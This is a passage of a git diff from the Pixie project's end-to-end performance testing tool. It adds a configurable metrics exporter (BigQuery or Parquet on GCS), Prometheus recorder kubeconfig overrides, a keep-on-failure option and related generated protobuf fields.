restricted to PEM execution, so the distributed planner " + "will always run it on the PEM even when the downstream sink is on Kelvin.") + .Example("df.hostname = px._pem_hostname()") + .Returns("The hostname of the PEM agent."); + } + + static udfspb::UDFSourceExecutor Executor() { return udfspb::UDFSourceExecutor::UDF_PEM; } +}; + class HostNumCPUsUDF : public ScalarUDF { public: /** diff --git a/src/e2e_test/perf_tool/cmd/BUILD.bazel b/src/e2e_test/perf_tool/cmd/BUILD.bazel index 012fd3488b0..23540786c4b 100644 --- a/src/e2e_test/perf_tool/cmd/BUILD.bazel +++ b/src/e2e_test/perf_tool/cmd/BUILD.bazel @@ -33,6 +33,7 @@ go_library( "//src/e2e_test/perf_tool/pkg/cluster", "//src/e2e_test/perf_tool/pkg/cluster/gke", "//src/e2e_test/perf_tool/pkg/cluster/local", + "//src/e2e_test/perf_tool/pkg/exporter", "//src/e2e_test/perf_tool/pkg/pixie", "//src/e2e_test/perf_tool/pkg/run", "//src/e2e_test/perf_tool/pkg/suites", diff --git a/src/e2e_test/perf_tool/cmd/run.go b/src/e2e_test/perf_tool/cmd/run.go index 5d8a89a9f7a..3ea06d5287b 100644 --- a/src/e2e_test/perf_tool/cmd/run.go +++ b/src/e2e_test/perf_tool/cmd/run.go @@ -45,6 +45,7 @@ import ( "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster/gke" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster/local" + "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter" "px.dev/pixie/src/e2e_test/perf_tool/pkg/pixie" "px.dev/pixie/src/e2e_test/perf_tool/pkg/run" "px.dev/pixie/src/e2e_test/perf_tool/pkg/suites" @@ -74,9 +75,13 @@ func init() { RunCmd.Flags().String("api_key", "", "The Pixie API key to use for deploying pixie") RunCmd.Flags().String("cloud_addr", "withpixie.ai:443", "The Pixie Cloud address to use for deploying pixie") + RunCmd.Flags().String("export_backend", "bq", "Export backend: 'bq' or 'parquet-gcs'") RunCmd.Flags().String("bq_project", "pl-pixies", "The gcloud project to put bigquery results/specs in") RunCmd.Flags().String("bq_dataset", "px_perf", "The name of the bigquery dataset to put results/specs in") RunCmd.Flags().String("bq_dataset_loc", "us-west1", "The gcloud region for the bigquery dataset") + RunCmd.Flags().String("gcs_bucket", "", "GCS bucket for parquet export (required when export_backend=parquet-gcs)") + RunCmd.Flags().String("gcs_prefix", "", "Path prefix within the GCS bucket for parquet export") + RunCmd.Flags().Int("parquet_batch_size", 10000, "Number of rows per parquet file when using parquet-gcs backend") RunCmd.Flags().String("gke_project", "pl-pixies", "The gcloud project to use for GKE clusters") RunCmd.Flags().String("gke_zone", "us-west1-a", "The gcloud zone to use for GKE clusters") @@ -95,6 +100,10 @@ func init() { RunCmd.Flags().String("ds_experiment_page_id", "p_g7fj6pf4yc", "The unique ID of the datastudio experiment page, used to print links to datastudio views") RunCmd.Flags().Bool("pretty", false, "Pretty print output json") + RunCmd.Flags().StringSlice("prom_recorder_override", []string{}, "Override kubeconfig/kube_context for a named prometheus recorder. Format: name=kubeconfig_path:kube_context (either side may be empty). Repeatable.") + RunCmd.Flags().Bool("keep_on_failure", false, "If the experiment fails, skip teardown (stop vizier/workloads/recorders and cluster cleanup) so the cluster state can be inspected. Implies --max_retries=1.") + RunCmd.Flags().String("skaffold_stderr_file", "", "If set, skaffold's stderr (build/render output) is appended to this file in addition to perf_tool's stderr. Useful in CI to capture a clean log to cat after a failure.") + RootCmd.AddCommand(RunCmd) } @@ -131,6 +140,15 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { return err } + promOverrides, err := parsePromRecorderOverrides(viper.GetStringSlice("prom_recorder_override")) + if err != nil { + log.WithError(err).Error("failed to parse --prom_recorder_override flags") + return err + } + for _, spec := range specs { + applyPromRecorderOverrides(spec, promOverrides) + } + var c cluster.Provider if viper.GetBool("use_local_cluster") { c = &local.ClusterProvider{} @@ -162,20 +180,24 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { } } - resultTable, err := createResultTable() + metricsExporter, err := createExporter(ctx) if err != nil { - log.WithError(err).Error("failed to create results table") - return err - } - specTable, err := createSpecTable() - if err != nil { - log.WithError(err).Error("failed to create spec table") + log.WithError(err).Error("failed to create exporter") return err } + defer metricsExporter.Close() containerRegistryRepo := viper.GetString("container_repo") + skaffoldStderrFile := viper.GetString("skaffold_stderr_file") maxRetries := viper.GetInt("max_retries") numRuns := viper.GetInt("num_runs") + keepOnFailure := viper.GetBool("keep_on_failure") + if keepOnFailure { + if maxRetries > 1 { + log.Warn("--keep_on_failure is set; forcing --max_retries=1 to avoid retries racing with preserved cluster state") + } + maxRetries = 1 + } eg := errgroup.Group{} experiments := make(chan *exp, len(specs)*numRuns) @@ -189,7 +211,7 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { s := spec n := name eg.Go(func() error { - expID, err := runExperiment(ctx, s, c, pxAPIKey, pxCloudAddr, resultTable, specTable, containerRegistryRepo, maxRetries) + expID, err := runExperiment(ctx, s, c, pxAPIKey, pxCloudAddr, metricsExporter, containerRegistryRepo, skaffoldStderrFile, maxRetries, keepOnFailure) if err != nil { log.WithError(err).Error("failed to run experiment") return err @@ -257,10 +279,11 @@ func runExperiment( c cluster.Provider, pxAPIKey string, pxCloudAddr string, - resultTable *bq.Table, - specTable *bq.Table, + metricsExporter exporter.Exporter, containerRegistryRepo string, + skaffoldStderrFile string, maxRetries int, + keepOnFailure bool, ) (uuid.UUID, error) { var expID uuid.UUID bo := &maxRetryBackoff{ @@ -268,7 +291,8 @@ func runExperiment( } op := func() error { pxCtx := pixie.NewContext(pxAPIKey, pxCloudAddr) - r := run.NewRunner(c, pxCtx, resultTable, specTable, containerRegistryRepo) + r := run.NewRunner(c, pxCtx, metricsExporter, containerRegistryRepo, skaffoldStderrFile) + r.SetKeepOnFailure(keepOnFailure) var err error expID, err = uuid.NewV4() if err != nil { @@ -335,7 +359,24 @@ func getExperimentSpecs() (map[string]*experimentpb.ExperimentSpec, error) { return nil, errors.New("must specify one of --experiment_proto or --suite") } -func createResultTable() (*bq.Table, error) { +func createExporter(ctx context.Context) (exporter.Exporter, error) { + switch viper.GetString("export_backend") { + case "bq": + return createBQExporter() + case "parquet-gcs": + bucket := viper.GetString("gcs_bucket") + if bucket == "" { + return nil, errors.New("--gcs_bucket is required when using parquet-gcs backend") + } + prefix := viper.GetString("gcs_prefix") + batchSize := viper.GetInt("parquet_batch_size") + return exporter.NewParquetGCSExporter(ctx, bucket, prefix, batchSize) + default: + return nil, fmt.Errorf("unknown export backend: %s", viper.GetString("export_backend")) + } +} + +func createBQExporter() (*exporter.BQExporter, error) { bqProject := viper.GetString("bq_project") bqDataset := viper.GetString("bq_dataset") bqDatasetLoc := viper.GetString("bq_dataset_loc") @@ -343,15 +384,16 @@ func createResultTable() (*bq.Table, error) { Type: bigquery.DayPartitioningType, Field: "timestamp", } - return bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "results", timePartitioning, run.ResultRow{}) -} - -func createSpecTable() (*bq.Table, error) { - bqProject := viper.GetString("bq_project") - bqDataset := viper.GetString("bq_dataset") - bqDatasetLoc := viper.GetString("bq_dataset_loc") - var timePartitioning *bigquery.TimePartitioning - return bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "specs", timePartitioning, run.SpecRow{}) + resultTable, err := bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "results", timePartitioning, exporter.ResultRow{}) + if err != nil { + return nil, err + } + var specTimePartitioning *bigquery.TimePartitioning + specTable, err := bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "specs", specTimePartitioning, exporter.SpecRow{}) + if err != nil { + return nil, err + } + return exporter.NewBQExporter(resultTable, specTable), nil } func getNumNodesInCluster(ctx context.Context, c cluster.Provider) (int, error) { @@ -388,3 +430,50 @@ func datastudioLink(dsReportID string, dsExperimentPageID string, expID uuid.UUI encodedParams := url.QueryEscape(params) return fmt.Sprintf("https://datastudio.google.com/reporting/%s/page/%s?params=%s", dsReportID, dsExperimentPageID, encodedParams) } + +type promRecorderOverride struct { + KubeconfigPath string + KubeContext string +} + +func parsePromRecorderOverrides(raw []string) (map[string]promRecorderOverride, error) { + out := make(map[string]promRecorderOverride, len(raw)) + for _, s := range raw { + nameAndVal := strings.SplitN(s, "=", 2) + if len(nameAndVal) != 2 || nameAndVal[0] == "" { + return nil, fmt.Errorf("invalid --prom_recorder_override %q: expected name=kubeconfig:context", s) + } + parts := strings.SplitN(nameAndVal[1], ":", 2) + ov := promRecorderOverride{KubeconfigPath: parts[0]} + if len(parts) == 2 { + ov.KubeContext = parts[1] + } + if ov.KubeconfigPath == "" && ov.KubeContext == "" { + return nil, fmt.Errorf("invalid --prom_recorder_override %q: at least one of kubeconfig or context must be set", s) + } + out[nameAndVal[0]] = ov + } + return out, nil +} + +func applyPromRecorderOverrides(spec *experimentpb.ExperimentSpec, overrides map[string]promRecorderOverride) { + if len(overrides) == 0 { + return + } + for _, m := range spec.MetricSpecs { + prom := m.GetProm() + if prom == nil || prom.Name == "" { + continue + } + ov, ok := overrides[prom.Name] + if !ok { + continue + } + if ov.KubeconfigPath != "" { + prom.KubeconfigPath = ov.KubeconfigPath + } + if ov.KubeContext != "" { + prom.KubeContext = ov.KubeContext + } + } +} diff --git a/src/e2e_test/perf_tool/experimentpb/experiment.pb.go b/src/e2e_test/perf_tool/experimentpb/experiment.pb.go index dc43e5d79be..923ed6cc1b9 100755 --- a/src/e2e_test/perf_tool/experimentpb/experiment.pb.go +++ b/src/e2e_test/perf_tool/experimentpb/experiment.pb.go @@ -647,8 +647,9 @@ func (m *PatchTarget) GetAnnotationSelector() string { } type PrerenderedDeploy struct { - YAMLPaths []string `protobuf:"bytes,1,rep,name=yaml_paths,json=yamlPaths,proto3" json:"yaml_paths,omitempty"` - Patches []*PatchSpec `protobuf:"bytes,2,rep,name=patches,proto3" json:"patches,omitempty"` + YAMLPaths []string `protobuf:"bytes,1,rep,name=yaml_paths,json=yamlPaths,proto3" json:"yaml_paths,omitempty"` + Patches []*PatchSpec `protobuf:"bytes,2,rep,name=patches,proto3" json:"patches,omitempty"` + SkipNamespaceDelete bool `protobuf:"varint,3,opt,name=skip_namespace_delete,json=skipNamespaceDelete,proto3" json:"skip_namespace_delete,omitempty"` } func (m *PrerenderedDeploy) Reset() { *m = PrerenderedDeploy{} } @@ -697,6 +698,13 @@ func (m *PrerenderedDeploy) GetPatches() []*PatchSpec { return nil } +func (m *PrerenderedDeploy) GetSkipNamespaceDelete() bool { + if m != nil { + return m.SkipNamespaceDelete + } + return false +} + type SkaffoldDeploy struct { SkaffoldPath string `protobuf:"bytes,1,opt,name=skaffold_path,json=skaffoldPath,proto3" json:"skaffold_path,omitempty"` SkaffoldArgs []string `protobuf:"bytes,2,rep,name=skaffold_args,json=skaffoldArgs,proto3" json:"skaffold_args,omitempty"` @@ -1254,6 +1262,9 @@ type PrometheusScrapeSpec struct { Port int32 `protobuf:"varint,4,opt,name=port,proto3" json:"port,omitempty"` ScrapePeriod *types.Duration `protobuf:"bytes,5,opt,name=scrape_period,json=scrapePeriod,proto3" json:"scrape_period,omitempty"` MetricNames map[string]string `protobuf:"bytes,6,rep,name=metric_names,json=metricNames,proto3" json:"metric_names,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` + KubeconfigPath string `protobuf:"bytes,7,opt,name=kubeconfig_path,json=kubeconfigPath,proto3" json:"kubeconfig_path,omitempty"` + KubeContext string `protobuf:"bytes,8,opt,name=kube_context,json=kubeContext,proto3" json:"kube_context,omitempty"` + Name string `protobuf:"bytes,9,opt,name=name,proto3" json:"name,omitempty"` } func (m *PrometheusScrapeSpec) Reset() { *m = PrometheusScrapeSpec{} } @@ -1330,6 +1341,27 @@ func (m *PrometheusScrapeSpec) GetMetricNames() map[string]string { return nil } +func (m *PrometheusScrapeSpec) GetKubeconfigPath() string { + if m != nil { + return m.KubeconfigPath + } + return "" +} + +func (m *PrometheusScrapeSpec) GetKubeContext() string { + if m != nil { + return m.KubeContext + } + return "" +} + +func (m *PrometheusScrapeSpec) GetName() string { + if m != nil { + return m.Name + } + return "" +} + type ClusterSpec struct { NumNodes int32 `protobuf:"varint,1,opt,name=num_nodes,json=numNodes,proto3" json:"num_nodes,omitempty"` Node *NodeSpec `protobuf:"bytes,2,opt,name=node,proto3" json:"node,omitempty"` @@ -1560,119 +1592,124 @@ func init() { } var fileDescriptor_96d7e52dda1e6fe3 = []byte{ - // 1786 bytes of a gzipped FileDescriptorProto - 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xac, 0x58, 0xcd, 0x73, 0x1b, 0x49, - 0x15, 0xd7, 0x48, 0xb2, 0x25, 0x3d, 0xc9, 0xb2, 0xdc, 0xf9, 0x40, 0xf1, 0xa6, 0xe4, 0xec, 0x6c, - 0x01, 0x21, 0xec, 0x5a, 0x24, 0xcb, 0x87, 0xd9, 0x2c, 0x5b, 0x25, 0xc9, 0x06, 0x2b, 0x71, 0x6c, - 0xd1, 0xf2, 0x7a, 0x61, 0x8b, 0xaa, 0xa9, 0xf6, 0x4c, 0x47, 0x9a, 0xf2, 0x7c, 0x65, 0xba, 0x95, - 0xb5, 0x39, 0x71, 0xa1, 0x38, 0x51, 0xc5, 0x01, 0xfe, 0x03, 0x0e, 0xfc, 0x09, 0xdc, 0x39, 0x00, - 0xb7, 0x1c, 0xf7, 0xe4, 0x22, 0xca, 0x85, 0xe3, 0x1e, 0xb8, 0x43, 0xf5, 0xc7, 0x8c, 0x46, 0xb2, - 0x92, 0x40, 0x15, 0xb7, 0x9e, 0x5f, 0xff, 0xde, 0xeb, 0xd7, 0xaf, 0xfb, 0xf7, 0x5e, 0x4b, 0xf0, - 0x5d, 0x16, 0xdb, 0x6d, 0xfa, 0x80, 0x5a, 0x9c, 0x32, 0xde, 0x8e, 0x68, 0xfc, 0xd4, 0xe2, 0x61, - 0xe8, 0xb5, 0xe9, 0x79, 0x44, 0x63, 0xd7, 0xa7, 0x01, 0x8f, 0x4e, 0x33, 0x1f, 0xdb, 0x51, 0x1c, - 0xf2, 0x10, 0xd5, 0xa2, 0xf3, 0xed, 0x94, 0xbb, 0xd9, 0x1a, 0x85, 0xe1, 0xc8, 0xa3, 0x6d, 0x39, - 0x77, 0x3a, 0x79, 0xda, 0x76, 0x26, 0x31, 0xe1, 0x6e, 0x18, 0x28, 0xf6, 0xe6, 0xf5, 0x51, 0x38, - 0x0a, 0xe5, 0xb0, 0x2d, 0x46, 0x0a, 0x35, 0xff, 0x9d, 0x87, 0xfa, 0x5e, 0xea, 0x78, 0x18, 0x51, - 0x1b, 0x3d, 0x84, 0xea, 0x73, 0xf7, 0x97, 0x2e, 0x8d, 0x2d, 0x16, 0x51, 0xbb, 0x69, 0xdc, 0x31, - 0xee, 0x56, 0x1f, 0x6c, 0x6e, 0x67, 0x17, 0xdb, 0xfe, 0x2c, 0x8c, 0xcf, 0xbc, 0x90, 0x38, 0xc2, - 0x00, 0x83, 0xa2, 0x4b, 0xe3, 0x0e, 0xd4, 0xbf, 0xd0, 0x73, 0xd2, 0x9c, 0x35, 0xf3, 0x77, 0x0a, - 0x6f, 0xb1, 0x5f, 0xfb, 0x22, 0xf3, 0xc5, 0xd0, 0x43, 0xa8, 0xf9, 0x94, 0xc7, 0xae, 0xad, 0x1d, - 0x14, 0xa4, 0x83, 0xe6, 0xbc, 0x83, 0x27, 0x92, 0x21, 0xcd, 0xab, 0x7e, 0x3a, 0x66, 0xe8, 0x63, - 0xa8, 0xd9, 0xde, 0x84, 0xf1, 0x24, 0xfa, 0xa2, 0x8c, 0xfe, 0xd6, 0xbc, 0x71, 0x4f, 0x31, 0x94, - 0xb5, 0x3d, 0xfb, 0x40, 0xdf, 0x81, 0x72, 0x3c, 0x09, 0x94, 0xe5, 0x8a, 0xb4, 0xbc, 0x31, 0x6f, - 0x89, 0x27, 0x81, 0xb4, 0x2a, 0xc5, 0x6a, 0x80, 0xde, 0x07, 0xb0, 0x43, 0xdf, 0x77, 0xb9, 0xc5, - 0xc6, 0xa4, 0xb9, 0x7a, 0xc7, 0xb8, 0x5b, 0xe9, 0xae, 0x4d, 0x2f, 0xb7, 0x2a, 0x3d, 0x89, 0x0e, - 0xf7, 0x3b, 0xb8, 0xa2, 0x08, 0xc3, 0x31, 0x41, 0x08, 0x8a, 0x9c, 0x8c, 0x58, 0xb3, 0x74, 0xa7, - 0x70, 0xb7, 0x82, 0xe5, 0xd8, 0xfc, 0xab, 0x01, 0xb5, 0x6c, 0x3a, 0x04, 0x29, 0x20, 0x3e, 0x95, - 0x89, 0xaf, 0x60, 0x39, 0x16, 0x39, 0x71, 0x68, 0xe4, 0x85, 0x17, 0x16, 0xe3, 0x34, 0x4a, 0x92, - 0xba, 0x90, 0x93, 0x5d, 0xc9, 0x18, 0x72, 0x1a, 0xe1, 0xaa, 0x93, 0x8e, 0x19, 0xfa, 0x11, 0xd4, - 0xc6, 0x94, 0x78, 0x7c, 0x6c, 0x8f, 0xa9, 0x7d, 0x96, 0x24, 0x74, 0x21, 0x27, 0xfb, 0x92, 0xd1, - 0x13, 0x0c, 0x3c, 0x47, 0x47, 0xdf, 0x84, 0x75, 0x62, 0x8b, 0x8b, 0x64, 0x31, 0xea, 0x51, 0x9b, - 0x87, 0xb1, 0xcc, 0x6a, 0x05, 0xd7, 0x15, 0x3c, 0xd4, 0xa8, 0xf9, 0x77, 0x03, 0x60, 0x16, 0x03, - 0xea, 0x41, 0x35, 0x8a, 0x69, 0x4c, 0x03, 0x87, 0xc6, 0xd4, 0xd1, 0xf7, 0x68, 0x6b, 0x7e, 0xd5, - 0xc1, 0x8c, 0xa0, 0x2c, 0xf7, 0x73, 0x38, 0x6b, 0x85, 0x3e, 0x82, 0x32, 0x3b, 0x23, 0x4f, 0x9f, - 0x86, 0x9e, 0xd3, 0xcc, 0x4b, 0x0f, 0xb7, 0xe7, 0x3d, 0x0c, 0xf5, 0x6c, 0x6a, 0x9e, 0xf2, 0xd1, - 0xb7, 0x21, 0x1f, 0x9d, 0x37, 0x0b, 0xcb, 0x6e, 0xc0, 0xe0, 0xbc, 0x77, 0xd0, 0x4f, 0x4d, 0xf2, - 0xd1, 0x79, 0x77, 0x0d, 0x74, 0xce, 0x2c, 0x7e, 0x11, 0x51, 0xf3, 0xf7, 0x06, 0x54, 0x33, 0x29, - 0x41, 0x1f, 0x43, 0xe1, 0x6c, 0x87, 0x2d, 0xdf, 0xc4, 0xe3, 0x9d, 0xe1, 0x20, 0x74, 0x18, 0xa6, - 0xc4, 0xb9, 0x90, 0xec, 0x6e, 0x69, 0x7a, 0xb9, 0x55, 0x78, 0xbc, 0x33, 0xdc, 0xcf, 0x61, 0x61, - 0x86, 0x7e, 0x08, 0x85, 0xe8, 0xdc, 0x5b, 0xbe, 0x81, 0xc1, 0xf9, 0x41, 0x66, 0x21, 0x65, 0x2a, - 0xb0, 0x1c, 0x16, 0x36, 0xdd, 0x1a, 0x80, 0x3c, 0x07, 0x15, 0xd6, 0x7d, 0xd8, 0xb8, 0xb2, 0x1a, - 0xba, 0x0d, 0x15, 0x71, 0x49, 0x58, 0x44, 0xec, 0xe4, 0xd6, 0xcc, 0x00, 0xf3, 0x08, 0xea, 0xf3, - 0x4b, 0xa0, 0x9b, 0xb0, 0xca, 0xec, 0xd8, 0x8d, 0xb8, 0x26, 0xeb, 0x2f, 0xf4, 0x75, 0xa8, 0xb3, - 0x89, 0x6d, 0x53, 0xc6, 0x2c, 0x3b, 0xf4, 0x26, 0x7e, 0x20, 0x03, 0xae, 0xe0, 0x35, 0x8d, 0xf6, - 0x24, 0x68, 0xfe, 0x02, 0x2a, 0x03, 0xc2, 0xed, 0xb1, 0xbc, 0xac, 0xb7, 0xa1, 0x78, 0x41, 0x7c, - 0x4f, 0x79, 0xea, 0x96, 0xa7, 0x97, 0x5b, 0xc5, 0x9f, 0x77, 0x9e, 0x1c, 0x60, 0x89, 0xa2, 0xfb, - 0xb0, 0xca, 0x49, 0x3c, 0xa2, 0x5c, 0x6f, 0x7d, 0xf1, 0x14, 0x84, 0x9b, 0x63, 0x49, 0xc0, 0x9a, - 0x68, 0xfe, 0x26, 0x0f, 0xd5, 0x0c, 0x8e, 0xbe, 0x05, 0x15, 0x12, 0xb9, 0xd6, 0x28, 0x0e, 0x27, - 0x91, 0x5e, 0xa5, 0x36, 0xbd, 0xdc, 0x2a, 0x77, 0x06, 0xfd, 0x9f, 0x08, 0x0c, 0x97, 0x49, 0xe4, - 0xca, 0x11, 0x6a, 0x43, 0x55, 0x50, 0x9f, 0xd3, 0x98, 0xb9, 0xa1, 0x0e, 0xbe, 0x5b, 0x9f, 0x5e, - 0x6e, 0x41, 0x67, 0xd0, 0x3f, 0x51, 0x28, 0x06, 0x12, 0xb9, 0x7a, 0x2c, 0x94, 0x76, 0xe6, 0x06, - 0x8e, 0xbc, 0x22, 0x15, 0x2c, 0xc7, 0xa9, 0xfa, 0x8a, 0x19, 0xf5, 0xcd, 0x25, 0x78, 0x65, 0x21, - 0xc1, 0x22, 0x6d, 0x1e, 0x39, 0xa5, 0xde, 0x4c, 0x1e, 0xab, 0x2a, 0x6d, 0x12, 0x4d, 0xd4, 0x81, - 0xda, 0x70, 0x8d, 0x04, 0x41, 0xc8, 0xc9, 0xbc, 0x94, 0x4a, 0x92, 0x8b, 0x66, 0x53, 0xa9, 0x9c, - 0x38, 0x6c, 0x5c, 0x91, 0x87, 0xa8, 0x37, 0x22, 0xb3, 0x56, 0x44, 0xf8, 0x58, 0x5c, 0xc7, 0x42, - 0x52, 0x6f, 0x44, 0xd6, 0x07, 0x02, 0xc4, 0x15, 0x41, 0x90, 0x43, 0x74, 0x1f, 0x4a, 0x91, 0xc8, - 0x25, 0x4d, 0x2a, 0xc6, 0xd7, 0x96, 0x1c, 0x80, 0x2a, 0x68, 0x9a, 0x67, 0xfe, 0xd6, 0x80, 0xfa, - 0xbc, 0xa6, 0xd0, 0x7b, 0xb0, 0x96, 0x68, 0x4a, 0xae, 0xab, 0xaf, 0x4d, 0x2d, 0x01, 0xc5, 0x5a, - 0x73, 0x24, 0x12, 0x8f, 0xd4, 0x82, 0x19, 0x52, 0x27, 0x1e, 0xcd, 0xc5, 0x53, 0xf8, 0x2f, 0xe3, - 0xb9, 0x80, 0x6a, 0x46, 0xac, 0xe2, 0x78, 0xa4, 0x77, 0x43, 0x55, 0x50, 0x31, 0x46, 0x2d, 0x80, - 0xf4, 0x34, 0x92, 0x75, 0x33, 0x08, 0xfa, 0x3e, 0xd4, 0x19, 0xe5, 0x56, 0xd2, 0x17, 0x5c, 0x75, - 0xe0, 0xe5, 0x6e, 0x63, 0x7a, 0xb9, 0x55, 0x1b, 0x52, 0xae, 0xdb, 0x41, 0x7f, 0x17, 0xd7, 0xd8, - 0xec, 0xcb, 0x31, 0xff, 0x6c, 0x00, 0xcc, 0xfa, 0x0c, 0xda, 0x51, 0x22, 0x56, 0x25, 0xe0, 0x9d, - 0x2b, 0x22, 0x1e, 0x4a, 0x11, 0x09, 0xe6, 0xa2, 0x86, 0xd1, 0x0e, 0x14, 0xa3, 0x38, 0xf4, 0xb5, - 0x08, 0xcc, 0xc5, 0x12, 0x18, 0xfa, 0x94, 0x8f, 0xe9, 0x84, 0x0d, 0xed, 0x98, 0x44, 0x54, 0x78, - 0xd8, 0xcf, 0x61, 0x69, 0xb1, 0xac, 0xf6, 0x3a, 0xcb, 0x6a, 0xaf, 0x28, 0x5f, 0xba, 0x69, 0xca, - 0x3a, 0x31, 0x2d, 0xc0, 0xda, 0x5c, 0x4c, 0xaf, 0x15, 0xfd, 0x6d, 0xa8, 0x30, 0x1e, 0x53, 0xe2, - 0xbb, 0xc1, 0x48, 0x06, 0x58, 0xc6, 0x33, 0x00, 0xfd, 0x18, 0x36, 0xec, 0xd0, 0x13, 0x6b, 0x88, - 0x18, 0xc4, 0x33, 0x21, 0x74, 0xd2, 0x8a, 0xaa, 0x1e, 0x1c, 0xdb, 0xc9, 0x83, 0x63, 0x7b, 0x57, - 0x3f, 0x38, 0x70, 0x63, 0x66, 0x33, 0x90, 0x26, 0xe8, 0x67, 0xb0, 0xce, 0xa9, 0x1f, 0x79, 0x84, - 0x53, 0xeb, 0x39, 0xf1, 0x26, 0x94, 0x35, 0x8b, 0xf2, 0x02, 0xb4, 0xdf, 0x90, 0xc7, 0xed, 0x63, - 0x6d, 0x72, 0x22, 0x2d, 0xf6, 0x02, 0x1e, 0x5f, 0xe0, 0x3a, 0x9f, 0x03, 0x11, 0x86, 0x35, 0x4e, - 0x4e, 0x3d, 0x6a, 0x85, 0x13, 0x1e, 0x4d, 0x38, 0x6b, 0xae, 0x48, 0xbf, 0x1f, 0xbc, 0xd1, 0xaf, - 0x30, 0x38, 0x52, 0x7c, 0xe5, 0xb5, 0xc6, 0x33, 0xd0, 0x66, 0x07, 0xae, 0x2d, 0x59, 0x1a, 0x35, - 0xa0, 0x70, 0x46, 0x2f, 0x74, 0xfe, 0xc4, 0x10, 0x5d, 0x87, 0x15, 0xb9, 0x1b, 0x5d, 0x28, 0xd5, - 0xc7, 0x47, 0xf9, 0x1d, 0x63, 0xf3, 0x14, 0x36, 0xae, 0xac, 0xb2, 0xc4, 0xc1, 0x0f, 0xb2, 0x0e, - 0xaa, 0x0f, 0xde, 0x7d, 0x4d, 0xd4, 0xca, 0xcb, 0x81, 0xcb, 0x78, 0x66, 0x0d, 0x13, 0xc3, 0xb5, - 0x25, 0x0c, 0xf4, 0x10, 0x4a, 0x49, 0x2e, 0x0c, 0x99, 0x8b, 0x37, 0x7b, 0x55, 0x72, 0xd3, 0x16, - 0xe6, 0x5f, 0x8c, 0x2b, 0x4e, 0xe5, 0xf5, 0x79, 0x04, 0x6b, 0xcc, 0x0d, 0x46, 0x1e, 0xb5, 0xd4, - 0x35, 0xd3, 0x32, 0x78, 0x6f, 0xa1, 0x19, 0x4b, 0x8a, 0xd2, 0xcc, 0xe0, 0xfc, 0x40, 0xd9, 0xef, - 0xe7, 0x70, 0x8d, 0x65, 0x26, 0xd0, 0x4f, 0x61, 0xc3, 0x21, 0x9c, 0x58, 0x5e, 0x28, 0x3b, 0xcd, - 0x24, 0xe0, 0x34, 0xd6, 0x09, 0x58, 0xf0, 0xb7, 0x4b, 0x38, 0x39, 0x08, 0x45, 0xe7, 0x91, 0xa4, - 0xd4, 0xdf, 0xba, 0x33, 0x3f, 0x21, 0xae, 0xbf, 0xda, 0x81, 0x7c, 0xbb, 0x99, 0x7f, 0x30, 0xe0, - 0xc6, 0xd2, 0x58, 0x44, 0x99, 0xe2, 0xae, 0x4f, 0x19, 0x27, 0x7e, 0x24, 0xba, 0x5c, 0x52, 0xcb, - 0x52, 0xb0, 0x17, 0x7a, 0x68, 0x2b, 0x15, 0x93, 0x6c, 0x05, 0xea, 0x70, 0x41, 0x41, 0x87, 0xa2, - 0x21, 0xbc, 0x03, 0x15, 0x79, 0x0c, 0xd2, 0x83, 0xea, 0x1e, 0x65, 0x09, 0x08, 0xeb, 0x5b, 0x50, - 0xe6, 0x64, 0x24, 0xa6, 0xd4, 0x25, 0xaf, 0xe0, 0x12, 0x27, 0xa3, 0x5e, 0xe8, 0x31, 0xf1, 0x42, - 0xba, 0xb1, 0x74, 0x4f, 0xff, 0xa7, 0xb8, 0xee, 0x01, 0x30, 0xfa, 0xcc, 0x72, 0x9d, 0x59, 0x60, - 0xaa, 0x5b, 0x0e, 0xe9, 0xb3, 0xfe, 0x6e, 0x2f, 0xf4, 0x70, 0x99, 0xd1, 0x67, 0x7d, 0x47, 0x38, - 0xfb, 0x04, 0xd6, 0x74, 0xca, 0xb4, 0xac, 0x8b, 0x6f, 0x93, 0x75, 0x4d, 0xf1, 0x95, 0xa4, 0xcd, - 0x7f, 0xe5, 0xe1, 0xfa, 0xb2, 0xda, 0xf5, 0xe6, 0xe7, 0x08, 0xfa, 0x06, 0xac, 0xfb, 0xa2, 0xb4, - 0x5b, 0xaa, 0x67, 0x0a, 0x3d, 0xe8, 0x57, 0x86, 0x84, 0x0f, 0x04, 0xfa, 0x98, 0x5e, 0xa0, 0x7b, - 0xb0, 0x91, 0xe5, 0x29, 0x95, 0xa8, 0x54, 0xaf, 0xcf, 0x98, 0x52, 0x9e, 0xa2, 0x29, 0x44, 0x61, - 0xcc, 0xe5, 0x0e, 0x56, 0xb0, 0x1c, 0x8b, 0xed, 0x31, 0x19, 0x53, 0xb2, 0xbd, 0x95, 0xb7, 0x6e, - 0x4f, 0xf1, 0x75, 0xc5, 0x3a, 0x49, 0x7f, 0x85, 0xc8, 0xd8, 0x9b, 0xab, 0x52, 0x4a, 0x1f, 0xbe, - 0xbd, 0x76, 0xeb, 0x9f, 0x26, 0xe2, 0x3c, 0x74, 0x71, 0xa9, 0xce, 0x4e, 0x88, 0x6d, 0x7e, 0x02, - 0x8d, 0x45, 0xc2, 0xff, 0x52, 0x58, 0xcc, 0x13, 0xa8, 0x66, 0x7e, 0xbe, 0x88, 0x9b, 0x18, 0x4c, - 0x7c, 0x2b, 0x08, 0x1d, 0xaa, 0x5e, 0xa7, 0x2b, 0xb8, 0x1c, 0x4c, 0xfc, 0x43, 0xf1, 0x8d, 0xee, - 0x41, 0x51, 0x4c, 0x68, 0x6d, 0xdd, 0x9c, 0x8f, 0x5d, 0x50, 0xa4, 0xf6, 0x25, 0xc7, 0xfc, 0x00, - 0xca, 0x09, 0x82, 0xde, 0x85, 0x9a, 0x4f, 0xec, 0xb1, 0x1b, 0x50, 0xd9, 0x4d, 0x74, 0x60, 0x55, - 